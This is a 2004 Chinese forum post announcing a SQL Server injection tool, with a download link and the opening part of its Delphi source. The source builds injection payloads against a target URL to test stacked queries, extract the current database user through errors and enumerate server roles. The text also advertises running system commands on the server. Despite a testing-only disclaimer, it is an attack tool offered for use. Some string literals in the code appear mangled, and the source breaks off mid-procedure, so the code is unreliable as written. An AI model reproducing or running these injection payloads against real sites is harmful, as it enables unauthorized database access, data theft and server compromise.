SQL Server注入工具 1.0

利用SQL Server的注入漏洞实现猜解数据库名，表名，字段名及记录的信息，由于网速的原因，目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令，同时可回显显示。

本程序只供测试研究使用，由此软件造成的后果一概不负责任，由于编写比较仓促，代码难免有纰漏之处，欢迎大家批评指正。

下载地址：http://free.efile.com.cn/hnxyy/NBSI.exe

作者:Hnxyy QQ:19026695

2004.12.16 北京

FireFox技术交流论坛

http://www.wrsky.com

临时访问地址

http://firefoxer.nease.net

It is all beginnings free

It is all ruin to be privately owned

D7原代码：

unit untmain;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,

IdTCPClient, OleCtrls, SHDocVw,mshtml;

type

TForm1 = class(TForm)

Label1: TLabel;

EdtUrl: TEdit;

BtnCheck: TButton;

Label2: TLabel;

GroupBox1: TGroupBox;

Label7: TLabel;

Label3: TLabel;

Label4: TLabel;

Label5: TLabel;

Label6: TLabel;

EdtMuliCase: TEdit;

EdtQuery: TEdit;

EdtUser: TEdit;

EdtPower: TEdit;

EdtDbName: TEdit;

Memo1: TMemo;

GroupBox2: TGroupBox;

cbDisp: TCheckBox;

EdtCommand: TEdit;

rbCmd: TRadioButton;

rbOA: TRadioButton;

BtnExecute: TButton;

GroupBox3: TGroupBox;

Memo2: TMemo;

wb: TWebBrowser;

BtnStop: TButton;

rbJob: TRadioButton;

BtnCancel: TButton;

procedure BtnCheckClick(Sender: TObject);

procedure BtnExecuteClick(Sender: TObject);

procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;

var URL: OleVariant);

procedure BtnStopClick(Sender: TObject);

procedure rbCmdClick(Sender: TObject);

procedure rbOAClick(Sender: TObject);

procedure rbJobClick(Sender: TObject);

procedure FormShow(Sender: TObject);

procedure BtnCancelClick(Sender: TObject);

private

{ Private declarations }

tag:integer;

isFinish,isCancel:boolean;

function Get(URL: string): boolean;

function GetWBMsg(URL: string): string;

Function StrToNChar(DbName,TName:string): string;

procedure SetRdbCheck(rd:TRadioButton);

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.BtnCheckClick(Sender: TObject);

const

vFieldCount=5;

PowerStr :array[0..6] of string=(

'sysadmin','dbcreator','diskadmin',

'processadmin','serveradmin',

'setupadmin','securityadmin');

var

Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;

i,j,k,iCount:integer;

VerStr,ValueStr,CountStr,Powers:string;

FieldStr,FieldOrdStr,CFieldStr:string;

vfield:OleVariant;

begin

try

EdtMuliCase.Text :=';

EdtQuery.Text :=';

EdtUser.Text :=';

EdtPower.Text :=';

EdtDbName.Text :=';

Url:=trim(EdtUrl.Text);

isFinish :=False;

vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);

Memo1.Clear;

Screen.Cursor :=crHourGlass;

//判断是否支持多句查询

if Get(Url+';declare%20@a%20int--') then

begin

EdtMuliCase.Text :='支持';

end else

begin

EdtMuliCase.Text :='不支持';

end;

//判断是否支持子查询

if get(Url+'%20and%20(Select%20count(1)%20from%20[sysobjects])>=0') then

begin

EdtQuery.Text :='支持';

end else

begin

EdtQuery.Text :='不支持';

end;

//取得当前用户

EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');

//取得当前用户登录的服务器角色成员

for i:=0 to High(PowerStr) do

begin

if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''+PowerStr[i]+'')%20as%20varchar(1))=1') then

begin

Powers :=Powers+PowerStr[i]+'|';

end;

end;

if Powers=' then

EdtPower.Text :='未知'

else EdtPower.Text :=Powers;

//指明当前用户是否为 db_owner 固定数据库角色的成员

{ if get(Url+'%20And%20Cast(IS_MEMBER('db_owner')%20as%20varchar(1))=1') then

begin

EdtPower.Text :='db_owner';

end else

begin

EdtPower.Text :='未知';